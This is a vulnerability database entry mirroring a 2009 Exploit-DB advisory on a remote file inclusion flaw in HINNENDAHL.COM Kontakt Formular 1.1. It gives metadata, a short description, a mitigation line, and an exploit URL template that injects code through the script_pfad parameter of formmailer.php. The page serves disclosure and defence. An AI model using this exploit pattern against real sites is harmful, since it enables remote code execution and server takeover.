HINNENDAHL.COM Kontakt Formular 1.1 (formmailer.php) Remote File Inclusion Vulnerability

vendor:

Kontakt Formular

by:

bd0rk

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Kontakt Formular

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: NO

Related CWE: N/A

CPE: a:hinnendahl:kontakt_formular:1.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

HINNENDAHL.COM Kontakt Formular 1.1 (formmailer.php) Remote File Inclusion Vulnerability

The $script_pfad parameter in /kontaktformular/formmailer.php isn't declared before require. So an attacker can execute some php-shellcode about it.

Mitigation:

Ensure that user-supplied input is validated and filtered before being used in a file include statement.

Source

Exploit-DB raw data:

                ########################################################
                #                                                      #
                # HINNENDAHL.COM Kontakt Formular 1.1 (formmailer.php) #
                #                                                      #
                #       Remote File Inclusion Vulnerability            #
                #                                                      #
                #                 by bd0rk || SOH-Crew                 #                                     #                                                      #
                #                  www.soh-crew.it.tt                  #
                #                                                      #
                #            Contact: bd0rk[at]hackermail.com          #
                #                                                      #
                ########################################################


[~] Affected-Software: HINNENDAHL.COM Kontakt Formular 1.1

[~] Vendor: http://www.hinnendahl.com/

[~] Download: http://www.hinnendahl.com/index.php?seite=download

[*] Greetz: inj3ct0r, DNX, Chip D3 Bi0s


Description: The $script_pfad parameter in /kontaktformular/formmailer.php
             isn't declared before require. So an attacker can execute some
             php-shellcode about it. (line 2 - 3)



[+]Exploit: http://www.example.com/kontaktformular/formmailer.php?script_pfad=[Ev!LC0de]



### The 21 years old, german Hacker bd0rk ### <---white-hat :-)